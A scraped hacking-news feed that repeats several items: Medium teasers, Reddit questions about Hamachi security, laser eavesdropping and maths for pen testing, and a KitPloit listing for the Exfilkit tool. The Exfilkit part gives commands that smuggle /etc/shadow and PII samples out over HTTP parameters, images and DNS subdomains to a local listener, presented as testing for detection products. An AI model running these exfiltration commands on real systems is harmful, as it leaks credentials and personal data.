Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cyber Security & Ethical HackingLearn Peerless Ethical Hacking Course By Joining IICS in Delhi
IICS (Indian Institute of Computer Science) offers a Comprehensive Ethical Hacking Training in Delhi. By affixing for this hacking course…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cyber Security & Ethical HackingLearn Peerless Ethical Hacking Course By Joining IICS in Delhi
IICS (Indian Institute of Computer Science) offers a Comprehensive Ethical Hacking Training in Delhi. By affixing for this hacking course…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cyber Security & Ethical HackingLearn Peerless Ethical Hacking Course By Joining IICS in Delhi
IICS (Indian Institute of Computer Science) offers a Comprehensive Ethical Hacking Training in Delhi. By affixing for this hacking course…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What Are The Advantages And Dangers Of Unified User Profiles?
https://cdn-images-1.medium.com/max/2600/0*z1Ou2ULCbwjuGMS0
In the past, MySpace allowed users to create a personal page called a “profile,” which contained only their photo and information about…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What Are The Advantages And Dangers Of Unified User Profiles?
https://cdn-images-1.medium.com/max/2600/0*z1Ou2ULCbwjuGMS0
In the past, MySpace allowed users to create a personal page called a “profile,” which contained only their photo and information about…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What Are The Advantages And Dangers Of Unified User Profiles?
In the past, MySpace allowed users to create a personal page called a “profile,” which contained only their photo and information about…
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hamachi and public network...
I am a mobile employee working for a small company, I do security practices but I am still a newbie.
I connect through publics networks everyday. Of course it's a no-brainer to use a VPN in a situation like this (I use nordvpn). But I need to access company's shared recourses, so I HAVE to use Hamachi thorough separate tunneling.
Worst case scenario in my head: someone with complete access to router initiating man-in-middle attack by any attack such as malicious DNS, IP spoofing, DDoS, etc.
Any Idea how to maximize security? Any places in Hamachi an attacker can initiate?
submitted by /u/Space_Chet
[link] [comments]
Hamachi and public network...
I am a mobile employee working for a small company, I do security practices but I am still a newbie.
I connect through publics networks everyday. Of course it's a no-brainer to use a VPN in a situation like this (I use nordvpn). But I need to access company's shared recourses, so I HAVE to use Hamachi thorough separate tunneling.
Worst case scenario in my head: someone with complete access to router initiating man-in-middle attack by any attack such as malicious DNS, IP spoofing, DDoS, etc.
Any Idea how to maximize security? Any places in Hamachi an attacker can initiate?
submitted by /u/Space_Chet
[link] [comments]
reddit
Hamachi and public network...
I am a mobile employee working for a small company, I do security practices but I am still a newbie. I connect through publics networks everyday....
HOW I GOT GOOGLE’S HALL OF FAME?
https://faiyazhacks.medium.com/how-i-got-googles-hall-of-fame-7537285b624d?source=rss------bug_bounty-5
https://faiyazhacks.medium.com/how-i-got-googles-hall-of-fame-7537285b624d?source=rss------bug_bounty-5
IntroductionContinue reading on Medium » (https://faiyazhacks.medium.com/how-i-got-googles-hall-of-fame-7537285b624d?source=rss------bug_bounty-5)
hacking: security in practice
Hacked Via Laser on window and how to block?
I have a unique situation where I need advice on this particular form of hacking and have been advised that this particular community/reddit was the best place to seek it. I have heard of white noise generators but the room being hacked via a window is my living room and if possible, would like to still use this room without the audible white noise.
Words can't express how desperately this advice is needed. Thanks.
submitted by /u/trappop
[link] [comments]
Hacked Via Laser on window and how to block?
I have a unique situation where I need advice on this particular form of hacking and have been advised that this particular community/reddit was the best place to seek it. I have heard of white noise generators but the room being hacked via a window is my living room and if possible, would like to still use this room without the audible white noise.
Words can't express how desperately this advice is needed. Thanks.
submitted by /u/trappop
[link] [comments]
reddit
Hacked Via Laser on window and how to block?
I have a unique situation where I need advice on this particular form of hacking and have been advised that this particular community/reddit was...
hacking: security in practice
Maths and hacking
Hi guys,
A question for those who work in a professional capacity in this field: how much maths is required, if any, for your role as a pen tester, for example? just wondering this as some say its not necessary but some say it is if you want to be an expert then it is required, especially for cryptography. Would not being good at maths hinder ones ability to excel in the field, I guess is the main question.
Thanks
submitted by /u/BackgroundAd7155
[link] [comments]
Maths and hacking
Hi guys,
A question for those who work in a professional capacity in this field: how much maths is required, if any, for your role as a pen tester, for example? just wondering this as some say its not necessary but some say it is if you want to be an expert then it is required, especially for cryptography. Would not being good at maths hinder ones ability to excel in the field, I guess is the main question.
Thanks
submitted by /u/BackgroundAd7155
[link] [comments]
reddit
Maths and hacking
Hi guys, A question for those who work in a professional capacity in this field: how much maths is required, if any, for your role as a...
Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities
http://www.kitploit.com/2022/06/exfilkit-data-exfiltration-utility-for.html
http://www.kitploit.com/2022/06/exfilkit-data-exfiltration-utility-for.html
Data exfiltration (https://www.kitploit.com/search/label/Exfiltration) utility for testing (https://www.kitploit.com/search/label/Testing) detection capabilities Description Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
/etc/shadow -> HTTP POST requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
PII -> PNG embedded (https://www.kitploit.com/search/label/Embedded) in HTTP Response Server $ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
Client # ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
PII -> DNS subdomains (https://www.kitploit.com/search/label/Subdomains) querying Server # ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r
Download Exfilkit (https://github.com/tasooshi/exfilkit)
Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
/etc/shadow -> HTTP POST requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
PII -> PNG embedded (https://www.kitploit.com/search/label/Embedded) in HTTP Response Server $ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
Client # ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
PII -> DNS subdomains (https://www.kitploit.com/search/label/Subdomains) querying Server # ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r
Download Exfilkit (https://github.com/tasooshi/exfilkit)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Phoneinfoga- Wikipedia of Phone Numbers.
https://cdn-images-1.medium.com/max/1280/1*to3dPtYms64Oil0lrIXlpA.png
The Wikipedia Of Phone Number…Read This Article To Know All The Information Of Your Phone Number, Its All PUBLIC!!
Continue reading on Medium »
Phoneinfoga- Wikipedia of Phone Numbers.
https://cdn-images-1.medium.com/max/1280/1*to3dPtYms64Oil0lrIXlpA.png
The Wikipedia Of Phone Number…Read This Article To Know All The Information Of Your Phone Number, Its All PUBLIC!!
Continue reading on Medium »